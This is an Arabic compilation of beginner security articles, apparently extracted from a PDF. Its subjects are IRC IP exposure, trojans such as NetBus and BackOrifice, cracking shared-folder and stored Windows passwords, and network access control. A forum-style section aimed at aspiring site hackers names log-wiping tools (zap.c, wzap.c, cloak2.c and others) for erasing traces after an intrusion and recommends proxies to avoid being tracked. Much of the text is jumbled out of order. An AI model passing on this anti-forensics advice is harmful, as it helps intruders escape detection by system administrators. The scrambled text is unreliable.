بك‪ ،‬ولكن يجب أن ل يفهم‬ ‫هذا الكلم بالشكل الخاطيء فمثل في نظام المحادثة ‪ IRC‬تقوم أنت بالتصال بمزود المحادثة ‪chat‬‬ ‫‪ server‬وكذلك الحال بالنسبة لجميع المستخدمين‪ ،‬بحيث يكون هذا المزود كالوسيط بينك وبين جميع‬ ‫الشخاص المتصلين به‪ ،‬فلكي تقوم بإرسال رسالة لشخص ما‪ ،‬يقوم برنامج المحادثة بإرسال الرسالة لمزود‬ ‫المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه ل يوجد اتصال مباشر بينك وبين أي شخص آخر‬ ‫خلل نظام المحادثة‪ ،‬ولها تلحظ أن برامج المحادثة غالبا ما تعطيك رقم ‪ IP‬للشخاص الخرين ناقصا‬ ‫)بالشكل التالي ‪ ( XXX.‬وبعد إجراء التصال يتمكن الشخص من الدخول لي من الغرف الموجودة في‬ ‫المزود كما يمكنه أيضا انشاء الغرف الخاصة به‪ ،‬كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذا‬ ‫المجال لذكرها‪.‬‬ ‫هناك استثناءان لهذا‬ ‫النظام‪ ،‬حيث يمكن لي‬ ‫شخص آخر في نظام‬ ‫المحادثة معرفة رقم ‪IP‬‬ ‫الكامل الخاص بك‪ ..‬‬ ‫فمثل لزيارة موقع ‪ CNN‬يجب أن تكتب ‪ 207.

‬‬ ‫قائمة ببعض المنافذ والتطبيقات المقابلة لها‬ ‫المنفذ‬ ‫‪25‬‬ ‫المنفذ‬ ‫‪31337‬‬ ‫‪1720.‬بالطبع فهذه المعلومات قد قام صاحب‬ ‫الموقع بإدخالها عندما قام بحجز اسم الموقع‪.com/cgi-bin/whois/whois‬وتقوم بإدخال اسم الموقع من دون‬ ‫‪ ) www‬مثل ‪( wagait.‬وأيضا احذر من‬ ‫استقبال الملفات ممن ل تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب‪ ،‬لن غرضه الوحيد ربما‬ ‫يكون الحصول على رقم الي بي الخاص بك‪.com‬وستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي‬ ‫ورقم هاتفه والفاكس وغيرها من المعلومات الخرى المتعلقة بالموقع‪ .‬‬ ‫‪ .networksolutions.2‬في حالة تبادلك الملفات مع شخص في نظام المحادثة‪ :‬فمزود المحادثة يقوم بدور الوسيط في نقل‬ ‫النصوص فقط‪ ،‬أما في حالة نقل الملفات فإنه يقوم بإعطاء كل الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر‬ ‫بحيث يقومان بنقل البيانات بينهما بشكل مباشر‪.‫دخلت بها )المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلحية من قبل من أنشأ‬ ‫الغرفة(‪ ،‬حيث أن المشرف يحصل على رقم الـ ‪ IP‬الكامل لكل شخص دخل غرفته‪.1503‬‬ ‫التطبيق المقابل‬ ‫‪FTP 21‬‬ ‫ارسال بريد الكتروني‬ ‫‪SMTP‬‬ ‫‪11‬‬ ‫التطبيق المقابل‬ ‫تروجان ‪BackOrifice‬‬ ‫برنامج ‪Netmeeting‬‬ .‬‬ ‫مما ذكر أعله‪ ،‬احذر من الدخول للغرف التي تكون مخصصة للهاكرز‪ ،‬حيث أنه المشرف )وهو هاكر في‬ ‫الغالب( سيحصل على رقم ‪ IP‬الخاص بك مباشرة مما يعرض جهازك لخطر الختراق‪ .‬‬ ‫من صاحب الموقع ؟‬ ‫لبد أنك قد زرت موقعا وأعجبك‪ ،‬وتساءلت في نفسك من هو صاحب هذا الموقع )سواء كان شخصا أو‬ ‫مؤسسة( ل داعي لن تحتار بعد الن فيكفي أن تذهب للموقع‬ ‫‪ /www.

‫‪80‬‬ ‫‪110‬‬ ‫‪139‬‬ ‫المحادثة ‪Chat‬‬ ‫‪6667‬‬ ‫‪ 12345.20034‬تروجان ‪NetBus‬‬ ‫ويب ‪Web‬‬ ‫استقبال بريد الكتروني‬ ‫‪POP3‬‬ ‫مشاركة ملفات في‬ ‫ويندوز‬ ‫انتهى‪،،،‬‬ ‫‪12‬‬ .

‬‬ ‫‪13‬‬ .‬‬ ‫تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها‪ ،‬وتتراوح خطورة الوظائف من‬ ‫التجسس على الجهاز ) مثل سرقة الملفات والبريد اللكتروني وكلمات السر المختلفة( حتى العبث بجهاز‬ ‫المستخدم بإخراج القراص المضغوطة )‪ (CD-ROM‬أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف‬ ‫صوت وغيرها من الوظائف الخرى المزعجة‪.‬‬ ‫‪ -2‬التروجان )‪:(Trojans‬‬ ‫التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم‬ ‫ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى )غالبا مخربة( بدون علم المستخدم‪ . SubSeven‬وطريقة عملها متشابهة وهي أن يقوم المخترق‬ ‫بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الخرون بسحبها ظنا منهم بأن هذه الملفات تقوم‬ ‫بوظائف مفيدة لهم‪ ،‬وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان‬ ‫داخل جهازه بحيث يتمكن المخترق )باستخدام برنامج عميل للتروجان ‪ (client‬من التحكم في جهاز‬ ‫المستخدم الضحية‪.‬وقد‬ ‫انتشرت هذه النوعية بكثرة في النترنت‪ ،‬نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من‬ ‫إمكانيات تصل في بعض الحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية‪.‬ولعله من المناسب عدم‬ ‫الطالة في الحديث عن الفيروسات‪ ،‬فالغالبية )إن لم يكن الكل( يعرفون خطرها وتأثيرها على أجهزة‬ ‫المستخدمين‪.‬‬ ‫لعل من أشهر التروجان المنتشرة في النترنت التروجان المسماة بـ "نت باس" ‪ NetBus‬و" باك اوريفيس‬ ‫" ‪ Back Orifice‬و "سب سيفين " ‪ .‬‬ ‫‪ -1‬الفيروسات )‪:(Viruses‬‬ ‫عندما يتم التحدث عن الخطار الموجودة في الحاسب اللي‪ ،‬تتوجه أذهان المستمعين تلقائيا للتفكير في‬ ‫الفيروسات‪ ،‬نظرا لنتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اللي‪ .‬ومن‬ ‫ثم يجب أن نعرف كيف نتقي شرهم‪ ،‬فنحن نقفل البواب لمعرفتنا أن اللصوص قد يدخلون منها في حال‬ ‫تركناها مفتوحة‪ .‬بالطبع فإننا سنلمح لهذه البرامج تلميحا‪ ،‬ولن نذكر أسماءها وذلك حتى ل يتم إساءة‬ ‫استغللها‪.‬كذلك هو الحال بالنسبة للحاسب اللي‪ ،‬فلكي تعرف كيف تحمي نفسك من شرور الهاكرز‪،‬‬ ‫يجب أن تعرف كيف يقومون باختراق جهازك‪ ،‬وما هي البواب التي يدخلون منها إلى أجهزتنا‪.‬‬ ‫في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات‪ ،‬والتي تساعدك على معرفة ما سنتحدث‬ ‫عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين )الهاكرز( من القيام بعملية الختراق لجهزة‬ ‫المستخدمين لشبكة النترنت‪ ،‬سواء كان هذا الختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب‬ ‫ومسح الملفات‪ .‫"مفاهيم خاصة بشبكات النترنت )الجزء الثاني("‬ ‫لكي تعرف كيف تحمي نفسك من أي خطر يجب أول أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن‬ ‫تعرف كيف تحمي نفسك من هذا الخطر‪ ،‬فمثل لكي نحمي أنفسنا من اللصوص‪ ،‬يجب أن نعرف خطرهم‪ .

‬طبعا قد تتساءل "كيف‬ ‫يستطيع الخرون الوصول لي ؟ وأنا جهاز ضمن المليين من الجهزة على النترنت" يؤسفني أن أقول لك‬ ‫أنه يتوافر الكثير من البرامج )وكما قلنا فلن نذكر أسماءها حتى ل يساء استخدامها ( والتي تمكن للشخص‬ ‫من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين‪ .‬بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة‬ ‫للمستخدم‪ ،‬ولكن عندما تكون متصل بالنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي‬ ‫وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر‪ .‫صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها‬ ‫‪ -3‬المشاركة في الطباعة والملفات في ويندوز‪:‬‬ ‫من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو القراص الصلبة في جهازه للمشاركة‬ ‫من قبل أشخاص آخرين على الشبكة‪ .‬وبعد الحصول على قائمة بهذه‬ ‫الجهزة فإنه ما على المخترق إل أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر )ويوجد أيضا‬ ‫الكثير من البرامج من هذا النوع( والتي تقوم بتجريب آلف الكلمات والتي تم تخزينها مسبقا في ملف حتى‬ ‫تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة‪ .‬وما يزيد الطين بلة أن بعض المستخدمين يقومون‬ ‫بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل‬ ‫المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!‬ ‫‪14‬‬ .

‬لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين‬ ‫نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لستغلل الثغرات المنية في متصفحك والدخول‬ ‫‪15‬‬ .‬‬ ‫‪ -5‬برامج وتطبيقات النترنت‬ ‫إن تطبيقات النترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج الخرى التي‬ ‫يتم استخدامها في النترنت‪ .‬فيوجد في النترنت العديد من البرامج التي‬ ‫تقوم بمهاجمة المستخدمين لهذا البرنامج‪ ،‬ويختلف تأثير هذه البرامج من الحصول على رقم ‪ IP‬الخاص‬ ‫بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن الستجابة للمستخدم مما‬ ‫يضطره للقيام بعملية إعادة للتشغيل!‬ ‫‪ -6 -6‬المواقع المشبوهة‪:‬‬ ‫من فترة لخرى يتم اكتشاف الكثير من الثغرات المنية في المتصفحات ويتم استغلل هذه الثغرات بشكل كبير‬ ‫من قبل أصحاب مواقع الهاكرز‪ .‬بالطبع فإن نظام‬ ‫ويندوز ‪ 98‬يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز ‪ ، 95‬ولكنها مسألة وقت حتى‬ ‫يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير‪.‬فحين‬ ‫حصول الهاكر على هذا الملف )والذي ينتهي بالمتداد ‪ ( PWL‬فإن كلمة السر الخاصة بجهازك هي ملك له‬ ‫وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر‪ .‫أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة‬ ‫‪ -4‬سرقة كلمة السر المخزنة‪:‬‬ ‫يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها‪ ،‬بالطبع‬ ‫فإن كلمة السر يتم تخزينها بشكل مشفر)‪ ، ( encrypted‬ولكن ل شيء يستعصي على الهاكرز‪ .‬وهو يعتبر من أكثر البرامج شعبية بين مستخدمي النترنت‬ ‫نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين‪ .‬ولكنه أيضا من أكثر البرامج شعبية للهاكرز‬ ‫نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم‪ .‬ولكن هذه البرامج قد تحتوي على العديد من الثغرات المنية التي تكون الباب‬ ‫المشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج ‪ ICQ‬الشهير الذي‬ ‫يستخدمه المليين من المستخدمين في النترنت‪ .‬هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات‬ ‫الشخصية من جهازك‪ .

‬‬ ‫انتهى‪،،،‬‬ ‫"المن عبر النترنت"‬ ‫‪16‬‬ .‬وأبسط المثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج )‪ (script‬يقوم بتكرار‬ ‫تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ل يستجيب للمستخدم مما‬ ‫يضطره لعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلفيها في متصفح إنترنت اكسبلورر ‪ 4‬وما فوق‬ ‫ولكنها تعطي مثال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون‪.‬‬ ‫في العدد القادم بإذن ال سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها‬ ‫لتقاء الهاكرز و شرورهم‪.‫إلى جهازك‪ .‬‬ ‫بالطبع فإن ما ذكرناه في هذا المقال ل يشمل جميع الطرق التي يستخدمها الهاكرز ‪ ،‬ولكنه كاف لعطاء فكرة‬ ‫عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالنترنت‪ ،‬مما يسهم في التقليل من‬ ‫احتمالية تعرضهم للختراق‪.‬ويتم دائما إصدار تعديلت لهذه المشاكل المنية ولكن أغلب المستخدمين‬ ‫ل يقومون بتركيبها‪ .‬لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه‬ ‫الخدمات عندما ل يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها‪ ،‬فمن المستحسن إيقاف تشغيلها عن‬ ‫اتصاله بالنترنت حتى ل يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين‬ ‫الذي يريدون استغلل هذه الخدمات للدخول في جهازك‪.‬‬ ‫‪ -7‬الخدمات الضافية‪:‬‬ ‫يشتمل نظام التشغيل على بعض الخدمات الضافية التي قد ل يحتاجها المستخدم والتي قد تكون المدخل إلى‬ ‫جهازك‪ ،‬فمثل بعض الصدارات من نظام ويندوز تحتوي على خادم ويب وخادم ‪ FTP‬وخادم بريد إلكتروني )‬ ‫‪ (SMTP‬وهي ل تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الحيان على ثغرات أمنية‬ ‫تمكن المخترقين من العبث بجهازك‪ .

‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<JawaDal :‬‬ ‫>ةةةةةةة‪:‬‬ ‫‪<z3r0‬‬ ‫هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات‬ ‫حسناا ‪here we G0‬‬ ‫الكثير من الناس يعملوا هاكينج من غير ما يعرفوا‪ .WTMP‬يسجل كل دخول\خروج‪ ،‬مع ميعاد الدخول\الخروج بالضافه الى ال ‪ host‬و ‪tty‬‬ ‫‪.FILES) 1‬‬ ‫ايه بقى ال ‪ LOG‬ده؟‍؟‬ ‫ال ‪ log files‬ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز)‪ (loged in‬و يحصلوا على معلومات‬ ‫مثل‪:‬‬ ‫يرون متى عملت الهاكينج بالضبط‬ ‫من اي موقع اتيت‬ ‫فضلت اد ايه ‪online‬‬ ‫ال ‪ IP Address‬بتاعك >>>>>>>‬ ‫ال ‪) host name‬اسم الجهاز(‬ ‫القاره‬ ‫الدوله‬ ‫المدينه‬ ‫المتصفح‬ ‫نظام التشغيل‬ ‫ال ‪screen resolution‬‬ ‫الوان الشاشه‬ ‫مزود الخدمه الخاص بك)‪>>>>(ISP‬‬ ‫هناك ‪ 3‬انواع ‪ log files‬مهمه‪:‬‬ ‫‪ ...--so on--‬‬ ‫يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر‪.21‬بتدوس عليه و تتصل بالموقع‪.‬هذا يعني‬ ‫انه تم اختراقك!!‬ ‫ده عشان لما بتعمل ‪ log in‬باوامر ‪ ftp‬بسيطه زي‪ .‬‬ ‫لكن تقدر ايضا تستخدم شيئ اسمه‪-: Wingate ...‬لقد تم اختراقك!!!‬ ‫حتى لما تستخدم امر بسيط مثل‪ /FTP ftp://hostname:‬في الدوس عندك و تدوس انتر‬ ‫او عندك ‪ GFI LANguard network security scanner‬و عملت سكان على سايت و لقيت كذا‬ ‫بورت مفتوح و منهم بورت ‪ ...‬بيفتحوا ال ‪ dos‬او ‪ ..‬‬ ‫‪17‬‬ ...‬لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي‬ ‫سيرفر و هيجيبك ‪ ..(LOG..shell account‬يكتبوا شويه‬ ‫اوامر و بووم‪.‬نفس الكلم لو بتستخدم اكثر من بروكسي‬ ‫جهازك‪<--‬خادم البروكسي الول‪<--‬خادم البروكسي الثاني‪<--‬الثالث‪.cd lcd dir ls :‬و اي حاجه تانيه‬ ‫لن مجرد ماتعمل ‪ log in‬في حاجه اسمها ‪LOGS.. (down‬‬ ‫ربما تقول‪ :‬مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لزم تعرفها عن البروكسيهات‬ ‫جهازك‪<--‬خادم البروكسي‪<--‬الموقع‪--FTP--‬تلنت او اي شئ اخر!‬ ‫لو اخترقت موقع و الدمن عاوز يعرف انت مين‪.LASLOG‬من اي جاء الدخول\خروج‬ ‫و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم )‪ (log..files‬سوف يوقع بك)‪track you‬‬ ‫‪.‬ديه مش ثغره!‪ ..UTMP‬من ‪ Onlne‬في هذه اللحظه‬ ‫‪..‬و نفس الشيئ عن طريق التلنت‪. it reboots .

c wtmped.c‬‬ ‫‪zap.‬هذه الجابه يجب ان يعرفها الجميع قبل ان يتعلم‬ ‫الهاكينج‬ ‫‪-1‬كيف تستخدم ال ‪ wingate‬؟ و اين نجده؟‬ ‫كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي اثار‬ ‫‪ tracks‬خلفنا؟‬ ‫ها هو برنامج اعرفه‪ :‬و اسمه ‪log modifier‬‬ ‫‪ah-1_0b..c marryv11.‬لكن بالنهايه ليس المهم كم سؤال سألت ‪ .‬سرقته هاهاها‪....c invisible.‬اذهب لجوجل و اكتب ‪ how to Stay anonymous on the web‬او ‪how to‬‬ ‫‪secure to secure my computer‬‬ ‫او زور موقع امني جيد و ابحث عن شئ كهذا ‪ .‬يجب ان يكون عندك لو كنت تريد‬ ‫اختراق موقع و تترك ايميلك فيه!‬ ‫تستطيع ان تحصل عليه من‪/http://www..pgpi...‬‬ ‫و الكثير‪ ..‬اممممممــم‬ ‫اه تذكرت!!‪ ..‬لقد خصلت عليه من المدرسه‪ ..‬مثل ال ‪ .org :‬‬ ‫‪ ok‬اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!‬ ‫ارجوا ان يعلمك هذا الدرس شيئا يا اخواني‬ ‫لكن لدي سؤال الن ‪ ..c cloak2...‬قبل كل شئ يجب ان تعرف كيف تظل ‪ anonymous‬على ال ‪ ..‬و سألت سؤالين او اكثر عن كيفيه البقاء ‪anonymous‬‬ ‫عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني‪ ...‬و لست الوحيد الذي يحتاج الجابه ‪ .‬و انا متأكد انك ستجد الكثير ‪.web‬و كيف تؤمن‬ ‫جهازك؟!!‪.... zone alarm‬امسح ملفات‬ ‫الهيستوري)كالكوكيز و النترنت هيستوري و ملفات النترنت المؤقته‪.spyware‬استخدم ‪ firewall‬مثل ال ‪ .‫‪ Wingate‬هو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر‪ .‬لذا ارجو يا اخي ان تبحث في هذا المجال اول ثم بعدها تتعلم الختراق‪..‬‬ ‫انتهى‪،،،‬‬ ‫"أمن الشبكات"‬ ‫‪18‬‬ .‬يجب‬ ‫ان تجد الجابه هذا هو المهم‪ !!!.‬نحتاج بعض الشخاص الذكياء ليعلمونا كيف نستخدمه و اين نجده؟!‬ ‫ماذا ايضاا‪.‬‬ ‫و ل تنسى ال ‪ Preety Good Privacy (PGP)d‬انه مجاني ‪ ..c‬‬ ‫==================================================‬ ‫==========================================‬ ‫هذا يا اخي كل ما عرفته في اخر اسبوعين‪ .‬فائده ال ‪ Wingate‬انه سيخفي‬ ‫ال ‪ IP‬عن الكمبيوتر الذي ستتصل به!!‬ ‫لكن للسف هذا كل ما اعرفه عنه‪ 1.‬و الملفات الشخصيه و اللوق( انا افعل‬ ‫هذه الشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه ‪ windows washer‬يجب ان يكون‬ ‫عندك‪ .tar clear.c wzap.

‬‬ ‫‪ -3‬عمليات الشبكة‪.‬‬ ‫‪-6‬استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة‪.‬‬ ‫أي شبكة قد تكون عرضة للوصول غير المرخص لي مما يلي‪:‬‬ ‫‪ -1‬المعدات‪.‬‬ ‫‪ -2‬وصف لعلقة الولوج الى الشبكة بأمنها‪.‬‬ ‫‪ -3‬كيفية حماية الموارد بواسطة تراخيص الوصول‪.‬‬ ‫‪ -4‬تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة المن الوطني المريكية ‪National‬‬ ‫‪.‬‬ ‫لذلك أرجو سماع وزاع ضميركم ‪.‬‬ ‫‪ -4‬شرح لمكونات ‪.‬‬ ‫‪ -4‬الموارد‪.‬‬ ‫و هناك بعض الجراءات التي تساعد في المحافظة على أمن الشبكة‪:‬‬ ‫‪ -1‬التدريب المتقن للمستخدمين على التعامل مع إجراءات المن‪.(Security Agency (NSA‬‬ ‫‪ -5‬تزويد المستخدمين بأجهزة ل تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ‪ ،‬و‬ ‫تتصل هذه الجهزة بالمزودات باستخدام رقاقة إقلع ‪ ROM Boot Chip‬و عند تشغيل هذه الجهزة يقوم‬ ‫المزود بتحميل برنامج القلع في ذاكرة ‪ RAM‬للجهاز ليبدأ بالعمل‪.‬‬ ‫وهذا لفتقار هذا القسم لمواضيع مثل هذه ‪.‬‬ ‫‪ -3‬حماية السلك النحاسية و إخفاءها عن العين لنها قد تكون عرضة للتجسس‪.‬‬ ‫‪ -7‬إعطاء تصاريح ‪ Permissions‬للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في‬ ‫هذه الحالة يجب مشاركة البيانات و المعدات للسماح للخرين باستخدامها‪.‬‬ ‫‪-------------------------------------------------------‬‬‫‪ -1‬عرض لبعض المخاطر المنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها‪.‬‬ ‫‪19‬‬ .‬‬ ‫تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة‪.ACL‬‬ ‫‪ -5‬شرح لعملية تفحص التراخيص‪.‬‬ ‫و يتم تنظيم المن وفقا لنوع الشبكة ‪ ،‬ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ‪ ،‬بينما يتحكم‬ ‫المزود في أمن شبكات الزبون المزود‪.‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫فى هذا الموضووع سأتناول بعض طرق الحماية نقل عن كتاب ‪.‬‬ ‫‪ -8‬تزويد المستخدمين بحقوق ‪ Rights‬تحدد النشطة و العمليات المسموح لهم إجراءها على النظام‪.‬‬ ‫‪ -2‬التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين‪.‬‬ ‫‪ -3‬البيانات‪.

‬‬ ‫في النظام الول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من‬ ‫قبل من لديه كلمة السر‪.‬‬ ‫عند إدخال السم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات ‪Security‬‬ ‫‪ (Accounts Manager (SAM‬فإذا كان الولوج الى جهاز ‪ Workstation‬فإن المعلومات يتم‬ ‫مقارنتها مع قاعدة بيانات حسابات المن المحلية في الجهاز‪ ،‬أما إذا كان الولوج الى نطاق ‪ Domain‬فإن‬ ‫المعلومات يتم إرسالها الى مزود ‪ SAM‬الذي يقارنها مع قاعدة بيانات حسابات النطاق‪ ،‬فإذا كان اسم‬ ‫المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام‪ ،‬أما إذا كانا صحيحين فإن‬ ‫‪20‬‬ .‬‬ ‫كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر‪.‬أنظر الصورة‪.‬‬ ‫‪ -2‬تصاريح الوصول‪.‬‬ ‫في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ‪ ،‬و يكفي أن‬ ‫يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و‬ ‫التصاريح المتوفرة له‪ ،‬و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل‬ ‫مستخدم‪.‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.

‬‬ ‫هناك نوعان ل ‪: ACE‬‬ ‫‪ -1‬الوصول مسموح ‪.No Access‬‬ ‫و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة ‪ SID‬الخاص به مع ‪ SIDs‬في كل ‪ACE‬‬ ‫من ‪ ACL‬للمورد‪.‬‬ ‫في ويندوز ‪ NT‬و ويندوز ‪ 2000‬يتم ترتيب ‪ ACE‬بحيث تكون ‪ AccessDenied ACEs‬قبل‬ ‫‪ ، AccessAllowed ACEs‬فإذا وجد ‪ SID‬خاصتك في أي من ‪AccessDenied ACEs‬‬ ‫فستمنع من الوصول الى المورد و إل فسيبحث في ‪ AccessAllowed ACEs‬للتأكد من الحقوق‬ ‫الممنوحة لك فإن لم يعثر على ‪ SID‬مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد‪.‬‬ ‫‪ -2‬تصريح تنفيذ للتطبيقات‪.(Access Control Entry (ACE‬‬ ‫يتم إنشاء ‪ ACE‬عند منح التصريح لستخدام المورد و تحتوي على ‪ SID‬للمستخدم أو مجموعته الممنوحة‬ ‫التصريح بالضافة الى نوع التصريح‪ ،‬فلو افترضنا أن مدير مجموعة ما قد ُمنح تصريح قراءة و تصريح‬ ‫كتابة لملف ما فإن ‪ ACE‬جديد يتم إنشاؤه ثم إضافته الى ‪ ACL‬الخاص بالملف و سيحتوي ‪ ACE‬على‬ ‫‪ SID‬لمدير المجموعة بالضافة الى تصريح قراءة و تصريح كتابة‪.‬‬ ‫يمتلك كل مورد من الموارد قائمة تحكم بالوصول ‪ (Access Control List (ACL‬و كل معلومة يتم‬ ‫إدخالها في ‪ ACL‬يطلق عليها ‪.‬‬ ‫‪ -2‬معرفات المجموعة ‪ Group SIDs‬و هي التي تحدد المجموعة التي ينتمي لها المستخدم‪.No Access‬‬ ‫و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا ٍأسهل‪.‬‬ ‫و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي‪:‬‬ ‫‪ -1‬تصريح قراءة و يسمح لك بعرض و نسخ الملفات‪.‬‬ ‫كما أنه يتم إصدار ‪ Access Token‬عند محاولتك التصال من جهازك بجهاز آخر على شبكتك و يطلق‬ ‫على هذا الجراء الولوج عن بعد ‪.‬‬ ‫‪ -3‬تصريح كتابة و يسمح بالتعديل في محتوى الملفات‪.‬‬ ‫‪ -4‬ممنوع الستخدام ‪.Remote Logon‬‬ ‫من المور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و‬ ‫محركات القراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لستخدام هذه الموارد‪.‬‬ ‫‪ -3‬المتيازات ‪ Privileges‬و هي تمثل الحقوق الممنوحة لحسابك‪.‬‬ ‫ملخص الدرس‪:‬‬ ‫‪21‬‬ .AccessAllowed‬‬ ‫‪ -2‬الوصول ممنوع ‪ AccessDenied‬و يتم إنشاؤها إذا كان تصريح الوصول هو ‪.‫نظام المن الفرعي يقوم بإصدار بطاقة ولوج ‪ Access Token‬تعرف النظام بالمستخدم فترة ولوجه و‬ ‫تحتوي هذه البطاقة على المعلومات التالية‪:‬‬ ‫‪ -1‬المعرف المني ‪ (Security Identifier (SID‬و هو رقم فريد خاص بكل حساب‪.

‫هناك بعض الجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها‪:‬‬ ‫تدريب المستخدمين ‪ ،‬حماية المعدات ‪ ،‬تشفير البيانات ‪ ،‬استخدام أجهزة عديمة القراص ‪ ،‬مراقبة العمليات‬ ‫التي تجرى على الشبكة‪.‬‬ ‫‪ -2‬تصاريح الوصول‪.‬‬ ‫انتهى‪،،،‬‬ ‫"مصطلحات مهمة للمبتدئين في اختراق المواقع"‬ ‫‪22‬‬ .‬‬ ‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.

